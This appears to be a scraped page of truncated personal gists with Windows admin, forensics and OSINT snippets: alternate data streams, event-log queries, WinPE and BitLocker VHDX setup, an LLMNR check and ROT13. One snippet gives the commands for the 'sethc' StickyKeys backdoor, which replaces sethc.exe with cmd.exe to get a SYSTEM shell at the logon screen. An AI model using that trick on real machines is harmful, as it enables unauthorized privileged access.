This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Create 'normal' file with some content. | |
New-Item -Name .\adstest1.txt -ItemType File -Value 'This is normal content.' | |
#Show content... | |
Get-Content -Path .\adstest1.txt | |
#Show Alternate Data Streams - only ':$DATA' | |
Get-Item -Path .\adstest1.txt -Stream * | |
#Add ADS named SecretADS with some content |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://tools.epieos.com/email.php | |
https://wigle.net/ | |
https://iaca-darkweb-tools.com/ | |
https://blog.appsecco.com/open-source-intelligence-gathering-201-covering-12-additional-techniques-b76417b5a544 | |
https://osintframework.com/ | |
https://www.lares.com/blog/social-profiling-osint-for-red-blue/ | |
https://www.kiledjian.com/main/2021/2/6/r1qnedk0dbki1686syjkqcyjwjkw3f | |
https://0x00sec.org/t/using-search-engines-for-fun-and-bounties/23832 | |
https://blueteamblog.com/15-free-web-based-osint-tools-and-how-to-use-them | |
https://medium.com/the-first-digit/osint-how-to-find-information-on-anyone-5029a3c7fd56 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Logparser | |
############### | |
# Security Log | |
############### | |
# Find Event id | |
& 'C:\Program Files (x86)\Log Parser 2.2\LogParser.exe' -stats:OFF -i:EVT "SELECT * FROM 'Security.evtx' WHERE EventID = '5038'" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Security log | |
#============ | |
#### | |
#4624 - Logon & Logoff events successful | |
#4625 - Logon unsucceful | |
#### | |
# Get usernames | |
Get-WinEvent -path .\Security.evtx | Where {$_.id -eq "4624"} | Foreach {([xml]$_.ToXml()).GetElementsByTagName("Data").ItemOf(5)}| Select -ExpandProperty "#text" -Unique | |
# Get domains |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#StickyKeys/sethc-Hack | |
#Save sethc.exe to c:\ | |
copy c:\windows\system32\sethc.exe c:\ | |
#Replace sethc.exe with cmd.exe | |
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe | |
#Reboot and on logon screen press SHIFT 5x -> cmd with SYSTEM-privileges |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Make Windows PE ISO | |
#https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/winpe-create-usb-bootable-drive | |
#01 - Install WADK | |
#02 - If Windows 10 > 1803 also install adkwinpesetup.exe | |
#https://docs.microsoft.com/en-us/windows-hardware/get-started/adk-install | |
#03 - Create Working directory | |
copype amd64 C:\WinPE_amd64 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#New-BitLockerVhdx.ps1, create a vhdx, enable BitLocker. | |
#->Share encrypted data between machines (mount, attach to VMs) and peers (vhdx->Stick) | |
#All with Windows standard tools. | |
throw "Nope. This is no script, just a bunch of cmdlets." | |
#Create a new vhdx | |
New-VHD -Path .\sec.vhdx -SizeBytes 1GB -Fixed | |
#Mount the vhdx |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Check if LLMNR will be used. | |
$RegPath = "HKLM:\Software\Policies\Microsoft\Windows NT\DNSClient" | |
$RegKey = Get-ItemProperty -Path $RegPath | Select-Object -Property 'EnableMulticast' | |
$RegValue = $RegKey.EnableMulticast | |
$RegCheck = Test-Path $RegPath | |
if ($RegCheck -eq $true) { | |
Write-Host "[+]The settings of $RegPath are $RegKey" -ForegroundColor Yellow | |
} | |
if ($RegCheck -eq $false) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#https://en.wikipedia.org/wiki/ROT13 | |
echo "Hail, Caesar!" | tr 'a-zA-Z' 'n-za-mN-ZA-M' | |
#Unvy, Pnrfne! | |
echo "Unvy, Pnrfne!" | tr 'a-zA-Z' 'n-za-mN-ZA-M' | |
#Hail, Caesar! | |
#To better understand this: | |
#tr accepts |
NewerOlder